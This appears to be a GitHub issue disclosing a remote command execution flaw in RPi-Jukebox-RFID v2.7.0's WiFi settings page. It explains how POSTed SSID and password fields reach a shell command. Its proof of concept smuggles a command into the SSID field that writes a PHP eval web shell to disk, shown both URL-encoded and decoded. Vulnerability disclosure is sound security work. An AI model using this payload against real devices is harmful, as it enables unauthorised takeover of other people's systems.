You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
We have three controllable variables($temp_ssid, $temp_pass, $temp_prio), but they need to meet the corresponding checks(Line 20, Line 22, Line25 and Line 28). It can be seen that the condition we need to meet is to use KEY values with prefixes WIFIssid_, WIFIpass_, and WIFIprio_, and strlen($temp_pass) >= 8.
In addition, since we are using bash -e mode, we must ensure that all commands before controllable points can be executed correctly. That is, we need to find the correct value for $conf['scripts_abs'] which can be found in the htdocs/settings.php
#htdocs/settings.phpinclude("inc.header.php"); // Line 3 (init $conf['scripts_abs'])...include("inc.setWifi.php"); // Line 191
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\inc.setWifi.php
Source from Line 14 (
$_POST
) .And then there is a check point(Line 8) ,which we should set
$_POST['submitWifi'] = submit
to bypass.Finally, the sink point executed a complex concatenated command(Line 38).
Let's briefly analyze this splicing command:
We have three controllable variables(
$temp_ssid, $temp_pass, $temp_prio
), but they need to meet the corresponding checks(Line 20, Line 22, Line25 and Line 28). It can be seen that the condition we need to meet is to use KEY values with prefixesWIFIssid_
,WIFIpass_
, andWIFIprio_
, andstrlen($temp_pass) >= 8
.In addition, since we are using
bash -e
mode, we must ensure that all commands before controllable points can be executed correctly. That is, we need to find the correct value for$conf['scripts_abs']
which can be found in the htdocs/settings.phpSo we need to POST htdocs/settings. php
Poc
POST /htdocs/settings.php
Data:
submitWifi=submit&WIFIssid_123=+%7c%7c+echo+%22%3c%3fphp+%40eval(%5c%5c%5c%24_POST%5b%5c%22shell6%5c%22%5d)%3b+%3f%3e%22+%3e+.%2fshell6.php+&WIFIpass_123=%7c%7c+echo+%221%22+%7c%7c+&WIFIprio_123=1
Here is the version without url encoding for ease of understanding:
submitWifi=submit&WIFIssid_123= || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php &WIFIpass_123=|| echo "1" || &WIFIprio_123=1
The concatenated command:
Manual verification
Logs
No response
Configuration
No response
More info
No response
The text was updated successfully, but these errors were encountered: